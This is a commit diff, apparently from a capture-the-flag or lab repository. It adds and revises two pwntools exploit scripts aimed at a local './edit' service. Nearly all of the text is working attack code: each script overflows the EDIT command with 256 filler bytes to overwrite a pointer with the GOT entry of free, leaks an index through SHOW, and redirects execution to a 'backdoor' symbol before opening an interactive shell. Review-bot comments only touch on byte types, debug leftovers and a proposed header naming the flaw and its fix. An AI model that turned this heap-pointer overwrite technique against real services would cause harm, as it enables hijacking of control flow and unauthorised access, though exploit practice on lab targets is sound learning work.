henry_2.0_commit

2024-11-06 10:23:47 +08:00
parent a7fdf479a5
commit 3d65a92466
17 changed files with 2709 additions and 33 deletions

Binary file not shown.

Binary file not shown.

18
input/edit.py Executable file → Normal file

@@ -2,7 +2,7 @@
# -*- coding:utf-8 -*-
from pwn import *
context.clear(arch='amd64', os='linux', log_level='info')
context.clear(arch='amd64', os='linux', log_level='debug')
elf = ELF('./edit')
@@ -11,23 +11,35 @@ sh = listen(12012)
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'ADD aaaa')
tcpClient.close()
print("successfully add")
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'EDIT aaaa ' + b'a' * 256 + p64(elf.got['free']))
tcpClient.close()
print(hex(elf.got['free']))
print("successfully edit")
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'SHOW')
tcpClient.recvline()
content = tcpClient.recvuntil('a'*0x100)
print(b"content ==> " + content)
index_str = tcpClient.recvline()[:-1]
second_str = tcpClient.recvline()[:-1]
tcpClient.close()
# print("index_str == " + hex(int(index_str,16)))
print(b"index_str == " + index_str)
print(b"second_str == " + second_str)
print("successfully show")
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'EDIT ' + index_str + b' ' + p64(elf.sym['backdoor']))
tcpClient.sendline(b'EDIT ' + second_str + b' ' + p64(elf.sym['backdoor']))
tcpClient.close()
print("successfully edit")
tcpClient = remote('127.0.0.1', 11012)
tcpClient.sendline(b'DEL ' + p64(elf.sym['backdoor'])[:3])
tcpClient.close()
print(hex(elf.sym['backdoor']))
sh.interactive()
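Review bot: `tcpClient.recvuntil('a'*0x100)` in the second hunk passes a str while every other send and receive in this file uses bytes, and the same filler is spelled `b'a' * 256` in the earlier EDIT line. Write it as `b'a' * 0x100`, or better, name the length once (`FILL = b'a' * 0x100`) so the two spellings cannot drift apart. The rendering has lost the `+`/`-` column, so this assumes the line is on the new side. The switch to `log_level='debug'` in the first hunk and the commented-out `# print("index_str == " + hex(int(index_str,16)))` look like debugging leftovers that should be dropped before the script is committed.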

34
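--- /dev/null
+++ b/input/edit2.py
@@ -0,0 +1,34 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+from pwn import *
+context.clear(arch='amd64', os='linux', log_level='info')
+elf = ELF('./edit')
+sh = listen(12012)
+tcpClient = remote('127.0.0.1', 11012)
+tcpClient.sendline(b'ADD aaaa')
+tcpClient.close()
+tcpClient = remote('127.0.0.1', 11012)
+tcpClient.sendline(b'EDIT aaaa ' + b'a' * 256 + p64(elf.got['free']))
+tcpClient.close()
+tcpClient = remote('127.0.0.1', 11012)
+tcpClient.sendline(b'SHOW')
+tcpClient.recvline()
+index_str = tcpClient.recvline()[:-1]
+print(index_str)
+tcpClient.close()
+tcpClient = remote('127.0.0.1', 11012)
+tcpClient.sendline(b'EDIT ' + index_str + b' ' + p64(elf.sym['backdoor']))
+tcpClient.close()
+tcpClient = remote('127.0.0.1', 11012)
+tcpClient.sendline(b'DEL ' + p64(elf.sym['backdoor'])[:3])
+tcpClient.close()
+sh.interactive()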
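Review bot: The new file has no header comment saying what it is for or which weakness in the target it demonstrates, and it repeats the sequence in input/edit.py almost line for line. From the visible lines the service's EDIT command appears to accept more than 256 bytes and overwrite an adjacent pointer, so a header such as `# Lab PoC for the local ./edit test service on 127.0.0.1:11012; shows EDIT lacks a length check (fix: bound the copy, build with full RELRO)` would record the finding and its remedy. That reading is inferred from the script alone and should be confirmed against the service source. If both scripts are kept, state in the same comment how edit2.py differs from edit.py, since the commit description does not.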

Binary file not shown.